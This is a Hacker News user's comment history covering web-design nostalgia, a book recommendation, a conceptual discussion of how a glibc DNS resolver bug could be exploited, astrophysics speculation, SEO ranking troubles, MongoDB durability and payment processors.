Hacker Newsnew | past | comments | ask | show | jobs | submit | spyrosk's commentslogin

For a moment I thought this was about https://csszengarden.com/pages/about/

(A long time ago) it was an amazing source to learn CSS, and get design inspiration.


I still consider those years to be the golden years of the web development. When the fruits of web standards movement started to appear. Alas, then came react and all the good stuff was thrown out of the window. I guess tag soup is palatable, when it is buried deep in node_modules.


Nowadays, I think the opposite. I feel a pang of jealousy and regret when I load a page from before CSS Zen Garden that uses tables for layouts. It still exists and works perfectly. I love how I can automatically date it in my mind, like period furniture or buildings. Unlike the thousands of pages that I made at the time, which are either gone or broken. I yearn for the html files that I lovingly handcrafted as unique pages. I destroyed them myself so that they could use a one-size-fits-all CSS solution. And they could in turn destroy each other with each new site redesign. If I ever get back on the indieweb, I'll be creating each page as a single file and allowing them to age gracefully.


I used to do web dev during the tables-as-layout days. I don’t miss them a little bit. For one, Netscape wouldn’t render anything if the table tag wasn’t closed, and still nothing regardless until it did hit the end tag. And that’s to say nothing of the dodgy layout quirks they had. No thanks.


They work now though. Do you remember all the CSS hacks? All those pages are broken today.

I'm not saying it's better, I'm just saying that I have a lot of regrets about jumping too hard on the bandwagon with a lack of critical thinking, and if I'm honest, evangelism.


Golden years ? I do remember spending nights without sleep against browsers and their CSS support.


I use https://goodsnooze.gumroad.com/l/macwhisper for this (no affiliation, just saw on HN before). IIRC there are also some open source solutions in the space compatible with Linux/win but I haven't tried them.


Thank you, looks perfect for my use case. I will check it out later today.


Coincidentally, yesterday I finished reading "Four Thousand Weeks: Time Management For Mortals" (https://www.harvard.com/book/four_thousand_weeks/).

It's a great book if you feel overwhelmed with all the things you must/should/want to do and struggle getting the most out of your remaining weeks.


Thanks for the recommendation - I just got back from the local bookshop and managed to grab a paperback copy.


So can someone ELI5 how bad this is?

From what I'm reading this should only affect systems that use a compromised DNS server or in a MitM attack scenario. Which is serious but not so easily exploitable (I think).


It's worse than that. According to https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html any system that performs a DNS lookup may be hit. And it's not hard to cause DNS lookups to happen (think reverse DNS lookups when logging login attempts, hovering a link in an email or webpage, etc):

  - A back of the envelope analysis
  shows that it should be possible 
  to write correctly formed DNS 
  responses with attacker controlled
  payloads that will penetrate a 
  DNS cache hierarchy and therefore
  allow attackers to exploit machines 
  behind such caches.
So even if you trust your local ISP and DNS servers, any random domain on the internet may be resolving to an exploit.

Also, this vulnerability has apparently been around since 2008, and sitting in public view on the bugtracker for many months. Who knows who else has been sitting quietly on this for however long? :-/


If you request a network connection to an attacker-controlled host, your network software may try to resolve the attacker's host name. The DNS NS record of their domain may then specify your resolver directly look up the record using the attacker's own name server, meaning you are directly doing DNS queries against the attacker's NS.

So in theory, all you need to be exploited is to connect to a compromised host and resolve its hostname.


It could be even worse than that. If the attacker tries to connect to you, your server may try to reverse their IP for logging, and the attacker can control the PTR record. Or the attacker could send you an email that's guaranteed to bounce, and they control the return path that your mailer has to resolve.


> Which is serious but not so easily exploitable (I think).

Oh it is. All you need is an open wifi with a router only dealing IPv4 addresses... start up radvd and serve your machine as authoritative IPv6 DNS server, and profit.


That requires local area access. So maybe easily exploitable, not easy to do mass infections.

Besides, how many distro's are actually configured for dhcpv6 stateful configuration out of the box?


Windows and OS X AFAIK, as well as the Debian installer... not sure about mainstream distros though.


Disclaimer: I have a layman's understanding (at best) of astrophysics.

Couldn't this be explained by an orbiting planet colliding with another body and breaking apart? Couldn't this satisfy the number of "comets" required for the hypothesis?


I have a degree in physics... and this seems like as reasonable an explanation as any other to date. We know planets migrate, we know large collisions occur, which tend to be followed by periods of bombardment (e.g. Thea/Earth -> Moon, Jupiter from inner to outer system), so the observations, particularly coupled with the gradual but significant dimming, could correspond with Kessler syndrome on a stellar scale.

Actually, I say that, but they also address this in the paper - a planetary collision would result in a huge amount of excess heat - infrared - and there isn't any. So scratch that. Whatever did this is cold from our point of view.


I don't get it. Couldn't it have cooled down already and we're only seeing the junk?


Unlikely. The only place for thermal energy to escape is into deep space, in the form of infrared radiation. Given that the dimming has been large and recent, it would have to have been a recent collision - which would take millions of years to cool.


I see, very interesting. Thank you for the reply!


Could you please elaborate on how you created the mirror?

I have almost the same setup (Arch, Linode, nginx) and although my VPS has been rock solid so far, I would like to have something like this for testing purposes.


It's a nice presentation but are the videos available somewhere?


Hi Spyrosk, the videos will be available shortly. If you want to get updated, send me an email (you find the contacts on my Twitter page, @simon).

Best,

Simone


Awesome. The #1 thing I hate about Slideshare is that I will find presentations that I wanted to see for myself.


Hi Stavro, how long has it been since you made the changes?

I've seen a couple of times similar behavior where a site disappeared from google's results for a couple of days, after some content and theme changes but everything was back to normal after that. In any case καλή τύχη.


Hey Spyro,

I made the change on the 16th, so it's been nearly two weeks now... Hopefully it will return, it was very nice to be able to say "I'm ranked just after python.org for 'learn python'" :/

Thanks for your help!


Hmm that's quite longer from my past experience, but not unheard of. What troubles me is that your pages haven't disappeared completely from Google's index, e.g. if you enter "site:korokithakis.net" there are 302 results returned.

Perhaps Google has reevaluated your ranking for these keywords, as there are a lot of PR6-7 sites but yours is a PR4 (at least according to the SEO Site Tools extension).

Your best bet is to follow infinity's advice and start blogging more frequently, while targeting specific keywords for your posts.


Ah, that's too bad then. All the tutorials used to be on the top of the results, so wouldn't they at least slip a few places down? I don't think they'd get removed completely if that were the case...


Not necessarily, for example your "Learn python in 10 minutes" post appears as a PR0 page, thus it won't outrank your competitors. Keep in mind that this could be just a temporal glitch and might get fixed automatically if/after your page is assigned a higher PR.

You mentioned that you've set up redirects from the old site to the new one, are you sure that your content doesn't appear twice, using different url's? (ks.net/node/1 and ks.net/tutorials/First) This will be penalized by Google.

Also your /tutorials url redirects back to the main domain, is this by accident?


Oh wow, that'd be why they don't appear, then. It used to be PR 5 or 6, now it's 0? All the old URLs (/node/<something>) are now redirected to the canonical ones, which is as it should be...

/tutorials/ points to / because I removed the page that was there and linked to them in the sidebar. I have no idea why Google would take the site from 6 PR to 0, wow...


There is absolutely no correlation between having a high Page Rank and outranking competitors. Go search for "hacker news" in google and you'll see that www.thehackernews.com (a PR 0 url) outranks twitter.com/hackernews (a PR 6).

The reason your site dipped out of the rankings is because when Google crawls a site and there have been significant changes to the structure (new theme, new internal linking structure, missing pages, etc), they yank you out of the index in order to reevaluate your proper position before moving forward. This can take a day, a week, a month, or half a year to recover; there is no way to predict how long it will take.

Try and replicate as much of your old site's structure as soon as possible, and just give it time.


I will do that, thank you. The old site structure was quite messy, with ugly URLs and links going back and forth to pages. I think this new scheme is much cleaner, now, as it's just a few links to pages. I'll try to add some categories or tags, though, and see how it goes.

Thanks again!


What about data persistence? Is it still enforced only through replication?

I really liked MongoDB's philosophy but this was the show stopper for me when I was exploring it. At least for some services I need to be certain that if the DB says it stored some data that really stored and not kept in volatile memory until it decides it's the right time to write them to disk.

It's been a while since I looked at it though, and that may no longer be the case. Are there any improvements in this area?


1.8 has single server durability, but TBH I haven't had a chance to check it out in depth yet.


http://saasy.com claim that they have solved this problem but I haven't yet used them. Does anyone else have any experience with them?


Seems really expensive (5.9% plus $.95 or 8.9% flat per transaction).

I've been getting setup with Stripe. They just lowered their rates to 3.5% (from 5%) plus $0.30 per transaction. Good API and no other fees. Seems great so far...

https://eta.stripe.com/faq


Everything was awesome up until this part of the FAQ:

-- Stripe transfers money to your bank account at the end of the following month: that is, you receive June's payments at the end of July.


That page seems to redirect to an incredibly minimalist welcome page saying:

  Stripe

  Payment processing for developers
  
  Get in touch
I think I'd need a bit more information before I'd even investigate them!


Stripe looks promising but based on their FAQ they are available only to US based companies/persons for now, so they are not an option I can consider, at least in the near future.


FastSpring, the company behind them, is well regarded by many shareware developers I know.


That looks very interesting. Receiving payments is such a huge hurdle for small projects outside of the U.S. (for example, PayPal doesn't provide Website Payments Pro in Ireland, banks are pretty difficult for new businesses, etc) Saasy looks like it might work.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: